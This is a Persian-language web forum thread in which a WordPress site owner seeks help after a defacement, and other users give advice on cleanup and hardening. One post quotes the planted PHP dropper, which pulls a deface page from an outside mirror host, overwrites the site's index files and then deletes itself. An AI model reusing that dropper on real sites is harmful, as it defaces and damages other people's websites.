هک شدن سایت

دیگر مباحث

توسط thearrow در 3 سال پیش
0 4k 17 3 سال پیش
thearrowphp-secmicrosoftmanstackoverflowbehnamdesigner
0

سلام من امروز به سایتم رفتم دیدم زد:

Hacked by 

فقط دیفیس شده بود و منم فایل index.php ـه وردپرس رو از اول آپلود کردم و درست و یوزرنیم و پسورد هم درست(عوض) کردم. پرمیشن این فایل رو هم کردم 444

من از هک و اینجور چیزا سر در نمیارم، آیا کسی هست که بتونه سایتم رو اسکن کنه و باگها رو شناسی کنه و بگه که چطوری برطرفشون کنم؟

اینم آدرس :

ممنون میشم کمک کنید

آخرین ویرایش: 28-10-2014 ساعت 22:24، توسط The Arrow
2

یعنی محتویات index.php رو تغییر داده بود دیگه؟ خود وردپرس که باگ شناخته شده نداره شاید قالبت باگ امنیتی داشته باشه که احتمالش کمه کل وردپرس رو بجز فایلهای اپلود و... از اول آپلود کن احتمال داره جایی shell گذاشته باشه. وقتی یه فایل رو تونسته تغییر بده یا توسط shell اینکارو انجام داده یا پسورد  نرم افزار مدیریت هاست(مثلا سی پنل) رو داشته که این خیلی خطرناکه مطمئنی پسورد رو لو ندادی؟ هاست از کجا گرفتی؟ Cpanel داری؟ اگر داری یه ویروس اسکن بزن

آخرین ویرایش: 28-10-2014 ساعت 17:39، توسط PHP.sec
0

پرمیشن مگه نباید 644 باشه؟ چون بود بعد من فایل index.php رو 444 کردم

الان دوباره رفتم تو سایت دیدم زده:

Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING in /home/ramtinak/public_html/wp-content/themes/ramtin-theme/index.php on line 2

اینبار انگار تم رو دستکاری کرده. فایل index.php رو اینجوری کرده :

<?php
$def = file_get_contents(\'http://zonehmirrors.net/defaced/2013/01/13/baltstudio.lt/index.html\');
$p = explode(\'public_html\',dirname(__FILE__));
$p = $p[0].\'public_html\';
if ($handle = opendir($p)) {
    $fp1 = @fopen($p.\'/index.html\',\'w \');
    @fwrite($fp1, $def);
    $fp1 = @fopen($p.\'/index.php\',\'w \');
    @fwrite($fp1, $def);
    $fp1 = @fopen($p.\'/index.htm\',\'w \');
    @fwrite($fp1, $def);
    echo \'Done\';
}
closedir($handle);
unlink(__FILE__);
?>

وقتی لینکی که توی این گذاشته رو باز کردم، انگار یکی دیگه ـست که دستکاری کرده! دوباره این قسمت رو آپلود کردم، پرمیشن این هم کردم 444  راستی ظهر رمز و پسورد اکانتم توی سایت هم عوض شده بود که از دیتابیس تغییر دادم اگه اشتباه نکنم توی وردپرس فقط میشه از دیتابیس یوزر لوگین رو عوض کرد

چطوری اینکار رو کرده؟ و اینکه دوباره عوض شده!

راستی همین الان هاست،ایمیل و.. هم اسکن کردم یکی پیدا شد:

هاست رو از آذرآنلاین گرفتم:http://azaronline.comفقط چندباری رمز هاست رو بهشون دادم چون چندتا مشکل داشت حلش کردن اما هربار قبل از رمز دادن اول اون رو میزاشتم رمز اولیه و به اونها میدادم، وقتی کارشون تموم میشد هم رمزمو عوض میکردم.

هاست سی پنل این سایت هم جوریه که توی هاست فقط یک یوزر میشه ساخت.

یعنی میگی از اول  وردپرس رو نصب کنم؟ اگه آره من بلد نیستم چطوری باید اطلاعات قبل رو برگردونم

آخرین ویرایش: 28-10-2014 ساعت 21:19، توسط The Arrow
4

درسته شل آپلود گرده اونی که انتی ویروست گرفته همون شله پاکش کن پسورد سی پنل رو عوض کن/ پسورد دیتابیس رو عوض کن همه پلاگینهای وردپرس رو موقتا غیر فعال کن


احتمال داره سایت تو مشکلی نداشته باشه این هکرها میان با استفاده از باگی که یکی از سایتهای روی سرور هست از اون دسترسی میگیرن بعد از اونجا میان سایت تورو میزنن! البته این احتماله! شاید سایت خودت باگ داشته یا پسوردت رو لو دادی یا دزدیدن :D

آخرین ویرایش: 28-10-2014 ساعت 21:34، توسط PHP.sec
0

کارهایی که گفتید رو انجام دادم من کلا دوتا افزونه نصب کرده بودم یکی Crayon syntex highliter بود اون یکی هم از قبل روی وردپرس بود(افزونه وردپرس فارسی)

و اینکه بعد از پاک کردن شل، این سنتکس هایلایتر هم توی لیست افزونه ها نبود منم رفتم تو هاست و به کل پاکش کردم.

من تم رو از یه سایت خارجی دانلود کرده بودم و تنها کاری که کردم ترجمه ی اون بود. شایدم یه جاییش رو خراب کاری کردم! فقط یه چیزی،چندروزی پهنای باند سایتم تموم شده بود، تا قبل از اینکه پهنای باند سایت تمومبشه این مشکلات نبود، بعد از اینکه تموم شد و من طرح سایتم رو بالاتر بردم رمز وردپرس عوض شده بود و اینکه رمز هاست هم به حالت اولیه برگشته بود(رمزی که آذرآنلاین داده بود).(فکر کنم تغییر رمز هاست واسه این بوده که من تعرفه ی هاستم رو عوض کرده بودم، بوده) 

در کل خیلی خیلی خیلی خیلی ممنون

آخرین ویرایش: 28-10-2014 ساعت 22:11، توسط The Arrow
4

سلام یکسری کارهای عمومی برای جلوگیری از لو رفتن پسورده که باید انجام بدید مثلا همیشه از Onscreen keyboard استفاده کنید(بهتر اینه که نیمی از پسورد رو با کیبورد و نیمی رو با Onscreen keyboard تایپ کنید) و تا زمانی که تو کنترل پنلتون وارد شدید دیگه تو اون مرورگر هیچ سایتی رو باز نکنید. این راه ها برای جلوگیری از لو رفتن پسورده اما منم فکر میکنم از سایتهای روی سرور خوردی. پسورد دیتابیس تو فایل config ذخیره میشه که این فایل رو باید بصورت رمز دربیاری تا هکر نتونه براحتی پسورد دیتابیست رو پیدا کنه.

0

ممنون چطوری باید فایل config رو به صورت رمز در بیارم؟

3

یکی از اشتباهاتی که انجام دادی این بود که پلاگین رو از یه سایت غیر از خود وردپرس دانلود کردی. خود وردپرس این امکان رو داره که از داخل داشبورد افزونه نصب کنی. برای Protect کردن فایل کانفیگ(wp-config) میتونی از نرم افزار های Obfuscator استفاده کنی مثل این: http://www.phpprotect.info/downloads.php بعلاوه حتما کنار فایل wp-config که تو روت هست یه فایل htaccess. درست کن و این محتویات رو توش بذار یا اگر وجود داره به آخرش اضافه کن:

<files wp-config.php>
order allow,deny
deny from all
</files>

برای اینکه ببینی درست انجام دادی بعد از مراحل بالا برو به این آدرس ببین باید پیام Access forbidden! بیاد.

http://youSite.ir/wp-config.php


این کد رو هم به اخر فایل wp-config.php اضافه کن:

define('DISALLOW_FILE_EDIT',true);

آخرین ویرایش: 29-10-2014 ساعت 11:26، توسط PHP.sec
1

کلیدهای امنیتی رو که تو wp-config هستن عوض کن میتونی از اینجا یه کلید تصادفی بگیریمثلا:

define('AUTH_KEY',         'NW,VnbM-V|?Uq]`F3}h;7xE+k-x++8Q7@U)Et+^{n+b{Ry%N8IvU|y/43Mq0SZr4');
define('SECURE_AUTH_KEY',  '.*_S%udC{R+wQtX)=/h2-i~VyEqlL-+;-Y.]jq:#Eq~+mhRi9ODuEk7%xUiy;)ld');
define('LOGGED_IN_KEY',    'vLt7ldlVbmx#j]Kez2lF(P&(T)v7MhnF3,Rv$R,,g=_c-3j6xx_GK<)+^JUwuIy)');
define('NONCE_KEY',        'qxYKP(Lwm3tQUm|2~+3X^6o,<y?J|lt-$5H|mp.;M6`)7LW$<-+j0aa)I=6qY*><');
define('AUTH_SALT',        'Qa[>~s8gtU^kdP_%O5+H>=|Z?iM++/UP_H2eBm4g%Uy909fWH DG$=rN!]WARu#h');
define('SECURE_AUTH_SALT', 'Z,qy$/[T+K9]t6<p1R?e|-Fp$I$xi|)(gCxi2aR^c>$a8A#C+ayfg><7?<vl?ly;');
define('LOGGED_IN_SALT',   '`X2:RofW|#~,Bd5!V:e2dW`m1KdO&QkKj(@J5k;_jy%=J1ItK@;ti8mynJSk}gCG');
define('NONCE_SALT',       'fAs-A9I3-Jl{7n^x`i~$Pto|Oj-F1L!(8bVq~_v&fK9sfO~x`9$+!^8:vc|]$2m/');
0

من افزونه رو از تو خودِ وردپرس نصب کردم، تم رو از وردپرس نگرفته بودم تمام کارهایی که گفتید رو انجام دادم. وقتی محافظت شد، این تکه کد توی فایل کانفیگ عوض شده بود:$table_prefix  = 'wp_';

اینجوری:$Vky1tkljcash  = 'wp_';که دیگه میخواست یک راست وردپرس رو راه اندازه کنه که هی میزد Table ـه موردنظر وجود ندارد که منم کردمش همون اولی.

راجع به htaccess هم نزد [color=#444444]Access forbidden! زد "صفحه ی مورد نظر پیدا نشد"[/color] [color=#444444]اما قبل از اضافه کردن کد به htaccess وقتی به آدرس کانفیگ میرفتم یک صفحه ی سفیدی میاورد.[/color] [color=#444444]الآن هیچ مشکلی وجود نداره[/color] [color=#444444]ممنونم[/color]

0

این دیگه چه وضعشه! این چرا همش یوزرنیم من عوض میشه؟!!!!!! باز یوزرنیم وردپرسم عوض شده! عجب بدبختی گیر افتادیما!

1

اگر نام کاربری عوض شده پس هکر به دیتابیس دسترسی داره. بعد از هک شدن نام و پسورد دیتابیس رو عوض کردی؟

0

فقط رمز رو عوض کردم! هم رمز ادمین پنل هاست هم رمز دیتابیس هم یوزرنیم وردپرس!

1

احتمالش وجود داره که تو سیستمت کیلاگر نصب باشه انتی ویروست چیه؟ پسورد هارو با کیبورد مجازی تایپ کن

0

من از آنتی ویروس خود ویندوز 8.1 استفاده میکنم و حقیقتا دو هفته ای هستکه نه آپدیت کردم نه اسکن! من چیزی تایپ نمیکنم، پسورد رو کپی پیست میکنم چون خیلی طولانیه

1

> من از آنتی ویروس خود ویندوز 8.1 استفاده میکنم و حقیقتا دو هفته ای هستکه نه آپدیت کردم نه اسکن! من چیزی تایپ نمیکنم، پسورد رو کپی پیست میکنم چون خیلی طولانیه

ها؟ :)  اسم اونو که نمیشه گذاشتن انتی ویروس! انتی ویروس نصب کن در ضمن هیچوقت پسورد رو کپی نکن چون اگر کیلاگر نصب باشه کارشو خیلی راحت تر میکنی. یه پسورد 10-12 رقمی بذار اما پیچیده و یطوری که یادت بمونه.

0

چه آنتی ویروسی نصب کنم؟ چون من کلا از آنتی ویروس بدم میاد! مخصوصــــــــــــــــــــــــــــــــــــــــــــــــــــا نود32! کلا اگه دسکتاپم بدون آنتی ویروس 15ثانیه طول میکشه که بیاد بالا با آنتی ویروس حدود 2دقیقه طول میکشه. کلا سرعت نمیزاره واسه آدم:(

1

ناد که خیلی سبکه! یعنی سبکترینه. انتی ویروس سیستم رو غیرفعال کن ناد نصب کن

خوش آمدید

برای طرح سوال، ایجاد بحث و فعالیت در سایت نیاز است ابتدا وارد حساب کاربری خود شوید. در صورتی که هنوز عضو سایت نیستید میتوانید در عرض تنها چند ثانیه ثبت نام کنید.

لطفا ابتدا لاگین کنید